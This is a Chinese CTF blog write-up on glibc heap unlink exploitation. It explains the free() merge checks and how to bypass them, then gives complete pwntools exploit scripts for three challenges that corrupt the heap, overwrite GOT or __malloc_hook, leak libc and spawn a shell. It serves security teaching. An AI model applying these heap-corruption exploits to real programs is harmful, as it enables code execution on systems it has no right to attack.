本文最后更新于 2024-02-11,文中内容可能已过时。
我看的 unlink 相关文章很多,但是最通俗易懂的还是 https://xz.aliyun.com/t/5748 ,这位师傅所写的所有文章都很好而且能够让人明白的理解。
堆块在释放时会有一系列的检查,可以与源码进行对照。在这里,将对一些关键的地方进行说明。为了使说明看起来简洁一些,就不展示源码了。
释放(free)时首先会检查地址是否对齐,并根据 size 找到下一块的位置,检查其 p 标志位是否置为 1.
检查释放块的 size 是否符合 fast bin 的大小区间,若是则直接放入 fast bin,并保持下一堆块中的 p 标志位为 1 不变(这样可以避免在前后块释放时进行堆块合并,以方便快速分配小内存),否则进入第 3 步。
若本堆块 size 域中的 p 标志位为 0(前一堆块处于释放状态),则利用本块的 pre_size 找到前一堆块的开头,将其中 bin 链表中摘除(unlink),并合并这两个块,得到新的释放块。
根据 size 找到下一堆块,如果是 top chunk,则直接合并到 top chunk 中去,直接返回。否则检查后一堆块是否处于释放阶段(通过检查下一堆块的下一堆块的 p 标志位是否为 0)。将其从 bin 链表中摘除(unlink),并合并这两块,得到新的释放块。
将上述合并得到的最终堆块放入 unsorted bin 中去。
这里有以下几个值得注意的点:
合并时无论向前向后都只合并相邻的堆块,不在往更前或者更后继续合并。
释放检查时,p 标志位很重要,大小属于 fast bin 的堆块在释放时不进行合并,会直接被放进 fast bin 中。在 malloc_consolidate 时会清除 fast bin 中对应的堆块下一块的 p 标志位,方便对其进行合并。
最基本的 unlink 定义如下:
1
2
3
4
5
6
#define unlink(P, BK, FD) {
FD = P->fd;
BK = p->bk;
FD->bk = BK;
BK->fd = FD;
}
上述代码直接进行了如下赋值:
1
2
*(fd + 24) = bk
*(bk + 16) = fd
新式的 unlink 中加入了更多的限制条件,具体参见 unlink 的利用方法。
现在来说说我的理解。
unlink 的目的
当目前要 free 的位置旁边有空闲的块,则考虑 unlink 把将要 free 的块,和相邻空闲的块合并。
unlink 的类型
1.向前合并,也就是上面那块是空闲的,我们要 free 后面那一块
2.向后合并,也就是下面那一块是空闲的,我们要 free 前面那一块。
unlink 的检测
在早期的版本是没有检测的,具体哪个版本我也不知道,但是我知道是早于 libc2.23 的,也就是大部分的比赛都是需要绕过检测的。
更新:libc-2.26 中新增了 unlink 对 chunk_size == next->prev->chunk_size 的检查,以对抗单字节溢出。但是在 Ubuntu16.04 的 libc-2.23 中也打了相应的补丁,所以我们比赛常见的 Ubuntu16.04 版本的 libc2.23 也需要绕过这个限制
检测的内容:
1
2
3
4
5
FD = P->fd
BK = P->bk
//条件
FD->bk == P
BK->fd == P
如果上述条件无法达到则报错,如果是一个没有被破坏的双向链表,则上述的检测内容是显然成立的,但是如果是被我们篡改的链表,也就是早期的版本中,BK 和 FD 直接分别对应加了偏移的要写地址和要修改的内容,那么就会报错了。
现在版本的绕过方法就是,通过程序储存的堆栈指针的那个数组,那个数组的内容中是存在 P 的指针的。
那么我们分别修改
1
2
3
//ptr 是储存 P 指针的地址
FD = ptr - 0x18
BK = ptr - 0x10
就可以成功的绕过检测,然后检测后 unlink 执行以下代码
1
2
FD->bk = BK
BK->fd = FD
前者对应,
1
2
*(ptr - 0x18 + 0x18) = ptr - 0x10
*(ptr - 0x10 + 0x10) = ptr - 0x18
两者覆盖到了同一个位置 ptr,且内容最终覆盖为 ptr - 0x18,这样我们就覆盖了原来拿来存放 P 的指针的位置。
这样我们再对原来的位置进行修改,就等同于可以读写 ptr - 0x18 的位置了,这样我们再次覆盖 ptr 的内容为我们想要修改的地址,这样我们就可以泄露地址并且 getshell。
unlink 的利用
基础结构:
1
2
3
4
5
6
7
8
9
10
11
12
struct malloc_chunk {
INTERNAL_SIZE_T prev_size; /* Size of previous chunk (if free). */
INTERNAL_SIZE_T size; /* Size in bytes, including overhead. */
struct malloc_chunk* fd; /* double links -- used only if free. */
struct malloc_chunk* bk;
/* Only used for large blocks: pointer to next larger size. */
struct malloc_chunk* fd_nextsize; /* double links -- used only if free. */
struct malloc_chunk* bk_nextsize;
};
由于 size 是按照 0x10 对其的,所以 size 的后三个字节用于其他内容储存,分别对应:
NON_MAIN_ARENA 是否属于主线程 0 属于 1 不属于
IS_MAPPED 是否由 mmap 分配
PREV_INUSE 记录前一个 chunk 块是否被分配
执行原理:
当我们要 free 的时候,堆管理器通过检测
向前合并:当前 size 位中的最低位(PREV_INUSE) 向后合并:下下个 heap 的 size 位中的最低位(PREV_INUSE)
来判定前一个 chunk 块是否被分配。
如果没被分配,会通过 prev_size 的内容,然后计算出前(后)一个块的指针,从而访问他们对应的 FD 和 BK,并且对前(后)一个块进行 unlink 操作。 总结:
检测是否可以向前或者向后合并 通过 prev_size 计算出空闲的块的指针 并加上空闲的块的 size,如果与 top_chunk 相邻,那还要和 top_chunk 合并 对空闲的块进行 unlink 利用方式简单描述:
修改 prev_size 修改 PREV_INUSE free -> unlink 利用方式具体描述:
我认为向前合并更容易利用一些,如果要向后合并则需要控制下下块的 PREV_INUSE。
所以我这里具体的讲向前合并的方法
add(0x88) #记为 a add(0x88) #记为 b FD = ptr - 0x18, BK = ptr - 0x10 修改 a 的内容,p64(0) + p64(0x88 - 0x10) + p64(FD) + p64(BK), 这个 size 应该是 size - 0x10,但是如果这里填写 p64(0),也不会报错(原因不明)
前者的原因是在 pool 数组里面存储的对应的 ptr 正好是和实际的指针相差 0x10(从数据段开始,FD 的位置),这相差的字节就是我们可以用于欺骗的点,我们欺骗系统 size 为 size - 0x10,并且对应的数据结构也从不可控制的位置转移到了可控制的位置(在原来的 FD 写入 prev_size,原来的 BK 写入 size) 修改 b 的 prev_size,p64(0x80)。系统根据此来确定前一个 chunk 的指针,也就是如果我们从真实的长度,0x90 变成 0x80,对应的指针也往后了 0x10。(这一步通常和上面的步骤一起写入,因为这一块虽是 b 的结构内容,但事实上在 a 没被 free 的时候是没有意义的,为了节省空间,这一块也就成为了 a 的内容,可以被 a 所控制) 修改 b 的 PREV_INUSE,修改为 0,如果有 off by one 或者堆溢出,则这一步也是和上面的一起 free(b) -> unlink(a) -> *ptr = ptr - 0x18 题目解析
UNCTF2020 baby_heap:
baby_heap 这道题目就是可以用 unlink 来做,这道题有 off by one 的漏洞,可以覆盖到下一个位的内容,所以我们可以利用这个多一位的内容,修改到 b 的 PREV_INUSE,如果是 off by null,那么可以创建(0xF8 = 0x100 - 0x8)的 size,使得 00 正好可以覆盖掉原来的 01,使得(01 10) -> (00 10),也达到了控制 PREV_INUSE 的目的。
其他条件都是正常功能可以达到的。不过值得一提的是,这道题 fastbin attack 是不可以的,因为题目通过 mallopt(1, 0);把 fastbin 关掉了;
其次因为没有 show 的功能(未实现),所以这道题拿不到 libc 的地址,但是这道题有后门函数,所以我们可以直接利用后门函数 getshell。
解析总结:
1.heap overflow + any size(unsorted bin) => unlink
2.off by one + any size(unsorted bin) => unlink
3.off by null + size:0xF8 => unlink
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
# -*- coding: utf-8 -*-
from pwn import *
r = process('./pwn')
#r = remote('node2.hackingfor.fun', 36705)
elf = ELF('./pwn')
context.log_level = "debug"
def add_note(size):
r.sendlineafter(">> ", "1")
r.sendlineafter("size?", str(size))
r.sendlineafter("content?", "a")
def delete_note(idx):
r.sendlineafter(">> ", "2")
r.sendlineafter("index ?", str(idx))
def change_note(idx, content):
r.sendlineafter(">> ", "4")
r.sendlineafter("index ?", str(idx))
r.sendafter("what is your new content ?", content)
ptr = 0x0000000000602160
shell = 0x000000000040097F
FD = ptr - 0x18
BK = ptr - 0x10
add_note(0x88) #91
add_note(0x88) #91
#gdb.attach(r)
change_note(0, p64(0) + p64(0x81) + p64(FD) + p64(BK) + 'a' * (0x88 - 0x20 - 0x8) + p64(0x80) + '\x90')
delete_note(1)
change_note(0, p64(0) * 3 + p64(elf.got['free']))
change_note(0, p64(shell))
delete_note(0)
r.interactive()
*CTF level8-unlink:
这道题目和上面一道题目的区别在于,这一道题目是 off by null,而且这一道题还没有 shell 函数,这意味着难度大大的增加。也更加像一个正常的程序了,相比上一道题目给出的莫名奇妙的 +1,这道题目 off by null 显得更加自然。这一道题目也没有 show 相关的函数,所有我们需要 leak libc。
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
void __fastcall __noreturn main ( __int64 a1 , char ** a2 , char ** a3 )
{
int v3 ; // eax
setbuf ( stdin , 0LL );
setbuf ( stdout , 0LL );
setbuf ( stderr , 0LL );
while ( 1 )
{
while ( 1 )
{
while ( 1 )
{
menu ();
v3 = read_int ();
if ( v3 != 2 )
break ;
edit_note ();
}
if ( v3 > 2 )
break ;
if ( v3 != 1 )
goto LABEL_13 ;
add_note ();
}
if ( v3 != 3 )
{
if ( v3 == 4 )
exit ( 0 );
LABEL_13 :
puts ( "em?" );
exit ( 0 );
}
delete_note ();
}
}
int edit_note ()
{
unsigned int v1 ; // [rsp+Ch] [rbp-4h]
printf ( "Input your id:" );
v1 = read_int ();
if ( v1 > 0xF || ! ptr [ v1 ] )
return puts ( "Are u a hacker?" );
printf ( "Content:" );
return ( unsigned __int64 ) read_content (( __int64 ) ptr [ v1 ], size [ v1 ]);
}
int add_note ()
{
int result ; // eax
int i ; // [rsp+8h] [rbp-8h]
int v2 ; // [rsp+Ch] [rbp-4h]
for ( i = 0 ; i <= 15 && ptr [ i ]; ++ i )
;
if ( i == 16 )
return puts ( "Full!" );
printf ( "Size:" );
v2 = read_int ();
if ( v2 > 512 )
v2 = 512 ;
ptr [ i ] = malloc ( v2 );
result = i ;
size [ i ] = v2 ;
return result ;
}
int delete_note ()
{
int result ; // eax
unsigned int v1 ; // [rsp+Ch] [rbp-4h]
printf ( "Input your id:" );
v1 = read_int ();
if ( v1 > 0xF )
return puts ( "Are u a hacker?" );
free ( ptr [ v1 ]);
ptr [ v1 ] = 0LL ;
result = v1 ;
size [ v1 ] = 0 ;
return result ;
}
漏洞就出现在 edit_note 中的 read_content 函数中
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
_BYTE * __fastcall read_content ( __int64 ptr , int len )
{
int v2 ; // eax
_BYTE * result ; // rax
char buf ; // [rsp+13h] [rbp-Dh]
int v5 ; // [rsp+14h] [rbp-Ch]
unsigned __int64 v6 ; // [rsp+18h] [rbp-8h]
v6 = __readfsqword ( 0x28u );
v5 = 0 ;
while ( v5 < len )
{
read ( 0 , & buf , 1uLL );
if ( buf == '\n' )
break ;
v2 = v5 ++ ;
* ( _BYTE * )( ptr + v2 ) = buf ;
}
result = ( _BYTE * )( v5 + ptr );
* result = 0 ; // off by null
return result ;
}
函数读取到\n 截止,但是最后在末尾赋值了一个 00。于是我们就可以利用这个进行 unlink,达到任意写的目的,但是目前没有 show 函数也无法 leak libc,所以只能手动创造 show 的机会,就可以把 free 函数改成 puts 函数,然后执行 free 函数的时候就等价执行了,put 输出了对应的内容。我这里采用的方法就是输出了 got 表中 puts 的位置。达到 leak 的目的,题目中给出了 libc 的数据,但是我们这里可以用搜索特征的方式直接利用。
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
# -*- coding: utf-8 -*-
from pwn import *
from LibcSearcher import *
r = process ( './level8-unlink' )
elf = ELF ( './level8-unlink' )
#r = remote('pwn.sixstars.team', 22508)
context . log_level = "debug"
def add_note ( size ):
r . sendlineafter ( ">> " , "1" )
r . sendlineafter ( "Size:" , str ( size ))
def edit_note ( idx , content ):
r . sendlineafter ( ">> " , "2" )
r . sendlineafter ( "Input your id:" , str ( idx ))
r . sendafter ( "Content:" , content )
def delete_note ( idx ):
r . sendlineafter ( ">> " , "3" )
r . sendlineafter ( "Input your id:" , str ( idx ))
add_note ( 0x88 )
add_note ( 0xF8 )
ptr = 0x6020C0
FD = ptr - 0x18
BK = ptr - 0x10
edit_note ( 0 , p64 ( 0 ) + p64 ( 0x81 ) + p64 ( FD ) + p64 ( BK ) + 'a' * ( 0x88 - 0x20 - 0x8 ) + p64 ( 0x80 ))
delete_note ( 1 )
edit_note ( 0 , p64 ( 0 ) * 3 + p64 ( elf . got [ 'free' ]) + p64 ( elf . got [ 'puts' ]) + ' \n ' )
edit_note ( 0 , p64 ( elf . plt [ 'puts' ])[: - 1 ] + ' \n ' )
delete_note ( 1 )
puts_addr = u64 ( r . recv ( 6 ) . ljust ( 8 , ' \x00 ' ))
print "puts_addr:" + hex ( puts_addr )
libc = LibcSearcher ( 'puts' , puts_addr )
libc_base = puts_addr - libc . dump ( 'puts' )
print "libc_base:" + hex ( libc_base )
system_addr = libc . dump ( 'system' ) + libc_base
edit_note ( 0 , p64 ( system_addr )[: - 1 ] + ' \n ' )
add_note ( 0x88 )
#gdb.attach(r)
edit_note ( 1 , '$0' + ' \n ' )
delete_note ( 1 )
r . interactive ()
这里需要注意的是:
写入的 00 在 got 表中容易把其他位置的数据搞坏,但是我们知道 libc 地址中实际上是有两位 00 的,所以我们可以少写一位 00,并用\n 来补上,当数据写入的时候会把\n 替换成\x00,这样就达到了不破坏其他位置的目的。 $0 <=> sh <=> /bin/sh 如果 got 表不能改写,那么可以考虑使用__free_hook *CTF level7-offbynull:
这道题目,是开了全保护的,所以不能直接利用 ptr 来 unlink,也不能改写 got 表。
思路是:
利用 unsorted bin leak 泄露 libc 地址 夹心饼攻击(house of einherjar),伪造 prev_size,使其向前跨越两个堆块,第一个堆块正常 free,第二堆块不变化,伪造 prev_size,让堆管理器认为 size 包含了两个堆块。当 free 第三个块的时候,会 unlink 第一个块(size 包含了第二个),这时候重新申请,就又得到了第二个堆块的控制权,同时之前申请的第二个堆块也未被使用。
这正是 ctf-wiki 中 Heap-based Off-By-One 中利用思路中的第二条,这里粘贴其中内容方便阅读。 溢出字节为可控制任意字节:通过修改大小造成块结构之间出现重叠,从而泄露其他块数据,或是覆盖其他块数据。也可使用 NULL 字节溢出的方法
溢出字节为 NULL 字节:在 size 为 0x100 的时候,溢出 NULL 字节可以使得 prev_in_use 位被清,这样前块会被认为是 free 块。
这时可以选择使用 unlink 方法(见 unlink 部分)进行处理。 另外,这时 prev_size 域就会启用,就可以伪造 prev_size ,从而造成块之间发生重叠。此方法的关键在于 unlink 的时候没有检查按照 prev_size 找到的块的大小与 prev_size 是否一致。 最新版本代码中,已加入针对 2 中后一种方法的 check ,但是在 2.28 前并没有该 check 。
所以我们 libc2.23 是可以利用的
leak 部分代码在 https://blog.wjhwjhn.com/archives/86/ 有详细解释
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
# -*- coding: utf-8 -*-
from pwn import *
from LibcSearcher import *
#r = process('./level7-offbynull')
r = remote ( 'pwn.sixstars.team' , 22507 )
context . log_level = "debug"
def add_note ( size ):
r . sendlineafter ( ">> " , "1" )
r . sendlineafter ( "Size:" , str ( size ))
def show_note ( idx ):
r . sendlineafter ( ">> " , "2" )
r . sendlineafter ( "Input your id:" , str ( idx ))
def edit_note ( idx , content ):
r . sendlineafter ( ">> " , "3" )
r . sendlineafter ( "Input your id:" , str ( idx ))
r . sendafter ( "Content:" , content )
def delete_note ( idx ):
r . sendlineafter ( ">> " , "4" )
r . sendlineafter ( "Input your id:" , str ( idx ))
#leak
add_note ( 0x88 ) #91
add_note ( 0x88 ) #91
delete_note ( 0 )
add_note ( 0x8 )
show_note ( 0 )
malloc_hook_addr = u64 (( r . recvuntil ( ' \n ' )[ - 7 : - 1 ]) . ljust ( 8 , ' \x00 ' )) - 0xE8
libc = LibcSearcher ( '__malloc_hook' , malloc_hook_addr )
libc_base = malloc_hook_addr - libc . dump ( '__malloc_hook' )
delete_note ( 0 )
delete_note ( 1 )
add_note ( 0x88 ) #0
add_note ( 0x68 ) #1
add_note ( 0xf8 ) #2
add_note ( 0x18 ) #3
delete_note ( 0 )
edit_note ( 1 , 'a' * 0x60 + p64 ( 0x70 + 0x90 ))
delete_note ( 2 )
#gdb.attach(r)
add_note ( 0x88 )
add_note ( 0x68 ) #1 == 2
delete_note ( 1 )
edit_note ( 2 , p64 ( malloc_hook_addr - 0x23 ) + ' \n ' )
add_note ( 0x68 ) #1
one = [ 0x45216 , 0x4526a , 0xf02a4 , 0xf1147 ]
one_gadget = libc_base + one [ 2 ]
add_note ( 0x68 ) #4
edit_note ( 4 , 'a' * 0x13 + p64 ( one_gadget ) + ' \n ' )
delete_note ( 4 )
r . interactive ()
wjh 收录于 Pwn